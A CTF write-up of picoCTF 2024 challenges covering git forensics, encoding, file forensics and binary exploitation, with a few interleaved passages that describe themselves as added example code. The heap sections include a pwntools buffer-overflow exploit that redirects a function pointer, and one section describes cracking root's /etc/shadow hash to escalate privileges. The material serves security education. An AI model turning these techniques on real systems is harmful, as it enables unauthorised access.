picoCTF 2024

General

Super SSH

```shell
ssh ctf-player@titan.picoctf.net -p 63095
```

Commitment Issues

After unzipping, we have a message.txt file with the following message

We can run git log to see older commits

From this we know that the flag was created in the previous commit

We can change to that commit

```shell
git checkout 87b85d7dfb839b077678611280fa023d76e017b8
```

We can now see the flag inside message.txt

Time Machine

After unzipping and reading message.txt, we find that the flag is in the git log

```shell
git log
```

Blame Game

The content of message.py is an unfinished command

If we run git log, we can see a huge list of commits

Redirect the output of the git log command to a .txt file

```shell
git log > output.txt
```

If we cat the output now, we can see the flag in the author name of one of the earliest commits

Collaborative Development

The content of flag.py:

If we list all branches, we can see several branches, each related to a different part of the flag

```shell
git branch -a
```

We can use git diff to see the differences between the branches; each branch holds a part of the flag

```shell
git diff feature/part-1 feature/part-2 feature/part-3
```

binhexa

In this challenge we need to answer a series of questions about binary operations; the numbers are random every time.
I used this binary calculator

In this challenge, the best strategy is to keep guessing the midpoint of the range left between the previous guesses (a binary search)

endianness

For this challenge I used a Python script to convert an ASCII string to its little-endian and big-endian hex representations; just change input_string

```python
def ascii_to_little_endian(input_string):
    # Convert the input string to ASCII bytes
    ascii_bytes = input_string.encode('ascii')

    # Little endian: hex of the bytes in reverse order
    little_endian_hex = ''.join(format(byte, '02x') for byte in reversed(ascii_bytes))

    return little_endian_hex


def ascii_to_big_endian(input_string):
    # Convert the input string to ASCII bytes
    ascii_bytes = input_string.encode('ascii')

    # Big endian: hex of the bytes in their original order
    big_endian_hex = ''.join(format(byte, '02x') for byte in ascii_bytes)

    return big_endian_hex


# Example usage for little endian:
input_string = "lopmo"
little_endian_hex = ascii_to_little_endian(input_string)
print("Little Endian Hexadecimal Representation:", little_endian_hex)

# Example usage for big endian:
big_endian_hex = ascii_to_big_endian(input_string)
print("Big Endian Hexadecimal Representation:", big_endian_hex)
```

dont-you-love-banners

We can use nc to see what information is leaking, and we can see a password

We can use this password to connect to the application

The other two questions are easily googled

We are now in a shell as the user player, and in its home directory we have a text file

We have access to the /root directory, but no permission to read flag.txt

However, we do have access to the /etc/shadow file

We can crack root’s password hash

Now just switch user to root and cat flag.txt

Binary Exploitation

format string 0

This one is very simple: we can spam the %p format specifier

heap 0

For this challenge, looking at the source code, the check_win function just compares the safe_var variable to the string “bico”; if safe_var is not equal to “bico”, the win code runs.
So we just need to overflow the buffer until safe_var is no longer equal to “bico”

We can just spam A’s and safe_var will be overwritten

heap 1

Looking at the source code, this is very similar to the previous challenge; however, this time the check_win() function will only run if safe_var is equal to “pico”

To find the point at which safe_var starts being overwritten, I created a 50-character pattern

```shell
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50
```

With this pattern, we can see that safe_var starts being overwritten at 0Ab1

So we just need to replace 0Ab1Ab2Ab3Ab4Ab5Ab with “pico”

Now just use option 4 to print the flag

heap 2

This time the check_win() function dereferences a pointer (x) and treats the value stored at that memory address as the address of a function

So we first need to find where x starts being overwritten, and then write the address of the win() function

Find where x starts being overwritten

x starts being overwritten after 32 chars
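To check the offsets read off the pattern in heap 1 (safe_var overwritten at 0Ab1) and heap 2 (x overwritten after 32 chars), here is an added Python reimplementation of the pattern_create/pattern_offset logic; it is not the write-up's own code nor Metasploit's, and the 50-byte length is the one the write-up used.

```python
import itertools
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0Ab1...), cut to length characters."""
    triplets = ("".join(t) for t in itertools.product(string.ascii_uppercase,
                                                       string.ascii_lowercase,
                                                       string.digits))
    pattern = "".join(itertools.islice(triplets, length // 3 + 1))
    return pattern[:length]


def pattern_offset(value, length):
    """Offset of value inside the pattern of the given length, or -1 if absent.

    A str is searched as-is (the fragment seen in the overwritten variable);
    an int is read as little-endian memory/register contents, like pattern_offset.rb does.
    """
    if isinstance(value, int):
        value = value.to_bytes((value.bit_length() + 7) // 8, "little").decode("ascii")
    return pattern_create(length).find(value)


if __name__ == "__main__":
    # The write-up sees "0Ab1" at the start of safe_var after sending the 50-byte pattern
    print(pattern_create(50))
    print("offset of 0Ab1:", pattern_offset("0Ab1", 50))  # 32, the padding heap 2 uses
```

The trailing 18 characters of the pattern are exactly the 0Ab1Ab2Ab3Ab4Ab5Ab that the write-up replaces with "pico".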

Then I used pwndbg to find the win() function address

The memory address for the win() function is 0x4011a0

Then I made a Python script that sends 32 chars followed by the memory address of the win() function

```python
from pwn import *

# Connect to the remote host and port
host = 'mimas.picoctf.net'
port = 61553
p = remote(host, port)

# Pause to allow time for the binary to start up
pause()

# Select option 2 to write to the buffer
p.sendline(b'2')

# 32 bytes of padding reach x, then the address of win() (0x4011a0) in
# little-endian byte order; only the low three bytes are sent, since the
# address fits in 24 bits and the upper bytes of x are already zero
payload = b"A" * 32 + b"\xa0\x11\x40"
p.sendline(payload)

# Select option 4 to call the function x points to and print the flag
p.sendline(b'4')

# Receive and print the flag
print(p.recvuntil(b'}').decode())
```

Forensics

Scan Surprise

After unzipping, we have a flag.png file that contains a QR code

We just need to scan it for the flag

Verify

In this challenge, ssh into the machine and cat checksum.txt

This is the sha256 checksum of the file we need to find

In the files directory we have a huge list of files

We just need to compute the sha256 hash of all the files and grep for the one from checksum.txt

```shell
sha256sum * | grep "fba9f49bf22aa7188a155768ab0dfdc1f9b86c47976cd0f7c9003af2e20598f7"
```

We now just run decrypt.sh with this file

CanYouSee

For this challenge, we just have a .jpg file

The image gives us nothing

I went to look at the magic bytes using head, and ended up finding a base64-encoded string

```shell
cat ukn_reality.jpg | head
```

We can just base64-decode this

Secret of the Polyglot

In this challenge, we have a PDF file; if we open it, we can see the second half of the flag

If we look at the file’s magic bytes, we find the PNG magic bytes

Just change the extension to .png and open it

We now have the first half of the flag too
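Both CanYouSee (a base64 string sitting in the JPEG's header) and Secret of the Polyglot (PNG magic bytes on a file that also opens as a PDF) come down to looking past the extension at the bytes. The following is an added Python example, not the write-up's own code: it lists every known signature found anywhere in a file and pulls out base64 runs that decode to printable text, run here over two constructed samples rather than the challenge files.

```python
import base64
import re

# File signatures to look for, both at offset 0 and embedded later in the file
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "PNG",
    b"\xff\xd8\xff": "JPEG",
    b"%PDF-": "PDF",
    b"PK\x03\x04": "ZIP (also APK)",
}
# A run of base64 alphabet characters long enough to be worth trying to decode
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def find_signatures(data):
    """Return (offset, format) for every known signature found in data, sorted by offset."""
    hits = []
    for magic, name in SIGNATURES.items():
        pos = data.find(magic)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def find_base64_strings(data):
    """Return the decoded text of every base64 run that decodes to printable ASCII."""
    found = []
    for match in B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # wrong length or padding: not real base64
            continue
        if decoded and all(0x20 <= b < 0x7f for b in decoded):
            found.append(decoded.decode("ascii"))
    return found


# Constructed sample 1: a PNG header with a PDF appended, the shape of a PNG/PDF polyglot
POLYGLOT = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24 + b"%PDF-1.4\n1 0 obj\n<<>>\nendobj\n%%EOF\n"

# Constructed sample 2: a JPEG whose COM (comment) segment carries a base64 string
SECRET = base64.b64encode(b"picoCTF{constructed_example}")
JPEG_WITH_COMMENT = (b"\xff\xd8\xff\xfe" + (len(SECRET) + 2).to_bytes(2, "big")
                     + SECRET + b"\xff\xd9")

if __name__ == "__main__":
    for name, sample in (("polyglot", POLYGLOT), ("jpeg", JPEG_WITH_COMMENT)):
        print(name, find_signatures(sample), find_base64_strings(sample))
```

To run it on a real file, pass `open(path, "rb").read()` to the two functions; a signature found at a non-zero offset is the polyglot tell, and a second format at offset 0 is what the rename-to-.png trick relies on.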

Mob psycho

This challenge gives us an APK file.
APK files can be unzipped; after unzipping we are left with a lot of files to search through

I ended up finding a flag.txt file

```shell
find . -type f -name "*flag*"
```

Convert from hex and we get the flag
